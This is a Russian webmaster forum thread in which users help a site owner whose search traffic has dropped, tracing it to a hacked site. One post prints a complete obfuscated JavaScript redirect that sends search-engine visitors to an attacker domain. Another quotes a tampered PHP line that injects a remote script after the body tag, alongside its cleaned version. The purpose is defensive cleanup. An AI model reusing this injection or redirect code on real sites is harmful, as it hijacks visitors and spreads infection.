Сегодня посещаемость упала на 70%

Сегодня посещаемость упала на 70%, Сегодня посещаемость в Яндексе упала на 70%

TEJlO11

Сообщений: 181 Регистрация: Авг 2010

#46

3 Июля 2011 00:46

Может конечно и реально сделать самому , но сколько времени пройдет

бр бр бр

hebroid

Сообщений: 514 Регистрация: Июл 2011

#47

3 Июля 2011 00:54

Итак, сайт http://promediagroup.ru/ тут тоже не причем, судя по всему он взломан таким же образом. Вредоносный код у них сидит в ява скрипте.

Значит, ваш сайт каким то образом ссылается на них, грузит редирект с их зараженного сайта, и редиректит на сайт злоумышленника.

Вот содержимое их редиректа:

Код

function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(une scape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20document.location.href%3D%27http%3A//shara.searchlots-all.ru/%27+%27%3Fwkey%3D"+l('9d837')+"%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));
}

Как видите,в нем прописаны рефереры поисковых систем.

hebroid

Сообщений: 514 Регистрация: Июл 2011

#48

3 Июля 2011 00:59

На будущее - поставьте в панели управления хостингом полный бекап хотя бы раз в три дня, а лучше каждый день. Из бекапа все можно восстановить в первозданный вид (если бекап чист).

TEJlO11

Сообщений: 181 Регистрация: Авг 2010

#49

3 Июля 2011 01:01

Я незнаю как это делается

wabex

Сообщений: 45 Регистрация: Окт 2010

#50

3 Июля 2011 01:07

TEJlO11, скачай файл index.php себена комп, открой его и в самом низу увидешь

Цитата

$tpl->compile ( 'main' );
$tpl->result['main'] = str_replace ( '{THEME}', $config['http_home_url'] . 'templates/' . $config['skin'], $tpl->result['main'] );
if ($replace_url) $tpl->result['main'] = str_replace ( $replace_url[0]."/", $replace_url[1]."/", $tpl->result['main'] );
$tpl->result['main'] = str_replace ( 'img src="http://'.$_SERVER['HTTP_HOST'].'/', 'img src="/', $tpl->result['main'] );

echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<sc ript src=http://promediagroup.ru/d.js></script>', $tpl->result['main']);
$tpl->global_clear ();
$db->close ();

GzipOut ();
?>

замени на

Цитата

$tpl->compile ( 'main' );
$tpl->result['main'] = str_replace ( '{THEME}', $config['http_home_url'] . 'templates/' . $config['skin'], $tpl->result['main'] );
if ($replace_url) $tpl->result['main'] = str_replace ( $replace_url[0]."/", $replace_url[1]."/", $tpl->result['main'] );
$tpl->result['main'] = str_replace ( 'img src="http://'.$_SERVER['HTTP_HOST'].'/', 'img src="/', $tpl->result['main'] );

echo $tpl->result['main'];
$tpl->global_clear ();
$db->close ();

GzipOut ();
?>

и все

hebroid

Сообщений: 514 Регистрация: Июл 2011

#51

3 Июля 2011 01:09

Нет у него такого

Цитата
echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<sc ript src=http://promediagroup.ru/d.js></script>', $tpl->result['main']);

TEJlO11, если будешь открывать index.php, не открывай блокнотом, открывай ТоталКоммандером.

Изменено: hebroid - 3 Июля 2011 01:11

TEJlO11

Сообщений: 181 Регистрация: Авг 2010

#52

3 Июля 2011 01:15

сейчас скачаю командер

wabex

Сообщений: 45 Регистрация: Окт 2010

#53

3 Июля 2011 01:15

hebroid, должен быть у меня такая же проблема как и у него...

TEJlO11

Сообщений: 181 Регистрация: Авг 2010

#54

3 Июля 2011 01:24

Нет такого в index.php

wabex

Сообщений: 45 Регистрация: Окт 2010

#55

3 Июля 2011 01:30

можешь выложить куда нибудь свой индекс.пхп?

hebroid

Сообщений: 514 Регистрация: Июл 2011

#56

3 Июля 2011 01:38

Кажется, нашел зацепку.

TEJlO11

Сообщений: 181 Регистрация: Авг 2010

#57

3 Июля 2011 01:38

http://ifolder.ru/24502293

hebroid

Сообщений: 514 Регистрация: Июл 2011

#58

3 Июля 2011 01:46

Не стоило выкладывать.

В index.php ничего не видно.

В исходном коде страницы все видно. Вот эта бяка, аккурат после <boby> сидит:

Цитата
<sc ript src=http://promediagroup.ru/d.js></script><sc ript language="javascript" type="text/javascript">

wabex

Сообщений: 45 Регистрация: Окт 2010

#59

3 Июля 2011 01:47

TEJlO11, хм... ни чего такого нету... может в маин.тпл какой код вставили или в .htaccess попробуй там поискать

TEJlO11 Сообщений: 181 Регистрация: Авг 2010	#60 3 Июля 2011 01:47 И где ее искать не знаешь?

Похожие темы:

28.02.2023 13:51	Сегодня 28.02 не работает вебмастер и метрика
15.04.2021 15:50	Проверьте свою посещаемость
26.02.2021 15:10	Сегодня день Апа ИКС
23.11.2017 03:39	Сегодня сильно упали позиции в Яндексе. Фильтр?
02.07.2017 12:43	Странная посещаемость из поиска

Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

Новые темы	Объявления	Свободное общение
16:04 LGaming - экосистема и партнерская программа в gambling и betting вертикалях 11:48 Google - шантажист, а Cloudflare - не спаситель. Как не отлететь в бан 11:47 Старые кости или свежее мясо? Как нагнуть старичка в серпе за один год 11:45 10.02 Яндекс штормит, а Google лезет в долги: 15 миллиардов на железки для ИИ 20:18 ЕС душит ТикТок: прощай бесконечная лента и RPM? Что с монетизацией? 20:14 Гугл пухнет от кеша, а нам - крошки. Разбор $114 млрд: Адсенс в минусе, Ютуб на подписках 20:11 01.02. Апдейт 31.01 // Chrome готовит "чёрную метку" для ИИ?	20:15 Nexulume.com Обменник без AML и KYC 17:47 Продажа аккаунтов HH.RU 17:06 - Вечные ссылки с трастовых сайтов 2024 проверен FastTrust 16:53 Мобильные и Резидентные Прокси Для Соц Сетей \| 3 Гб Бесплатно 12:59 Mixmasters - Exchange without AML and KYC 09:05 Swapwatch.org — Мониторинг криптовалютных обменников 08:45 GhostRocket.pro — Взлетаем в новую эру криптообмена!	20:56 блокировка youtube 2026: ркн начинает «выдавливание». кто уже пробовал вк видео? 20:54 Туалетные секреты: Замурчательная тема 17:44 [AI] Бот за $600к советовал есть сыр с крысами. Нью-Йорк его (наконец-то) снес 17:39 Кулеры и БП станут золотыми? Медь по 13 штук, олово в космосе 15:24 Сайты Рунета 15:22 Moltbook: Соцсеть для ботов, где людям закрыли рот. Началось? 03:45 Гильотина для классиков: Клод доедает физические книги